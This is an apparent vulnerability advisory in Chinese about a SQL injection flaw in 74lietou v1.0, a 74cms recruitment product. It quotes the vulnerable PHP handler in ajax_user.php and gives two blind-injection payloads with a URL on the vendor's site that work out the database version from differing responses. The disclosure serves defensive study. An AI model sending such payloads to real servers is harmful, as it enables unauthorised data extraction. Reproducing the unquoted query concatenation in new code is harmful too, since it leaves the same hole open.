74lietou v1.0最新注入2处(可获取部分数据)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 官网地址:http://74lietou.74cms.com/ ### 详细说明: 在/plus/ajax_user.php中 ``` elseif($act == 'only_check_language'){ $lang = trim($_POST['param'])?trim($_POST['param']):exit("选择语言不能为空!"); $sql = "select * from ".table('resume_language')." where language = ".$lang." and uid = ".$_SESSION['uid']; $userinfo=$db->getone($sql); if ($userinfo) { exit("已经选择此语言!"); }else{ exit("y"); } ``` POST值过来,没有单引号包含,导致注入 http://74lietou.74cms.com/plus/ajax_user.php?act=only_check_language POST值 ``` param=12' ||%20left(version(),1)%20between%200%20and%205--%20a ``` 这样猜解数据库版本第一位是0到5之间,返回已经选择此语言! ``` param=12' ||%20left(version(),1)%20between%200%20and%204--%20a ``` 这样猜解数据库版本第一位是0到4之间,返回y [<img src="https://images.seebug.org/upload/201507/211154592e62268ccfed4629294c1486b10c0c82.jpg" alt="360截图-1870531.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/211154592e62268ccfed4629294c1486b10c0c82.jpg) [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息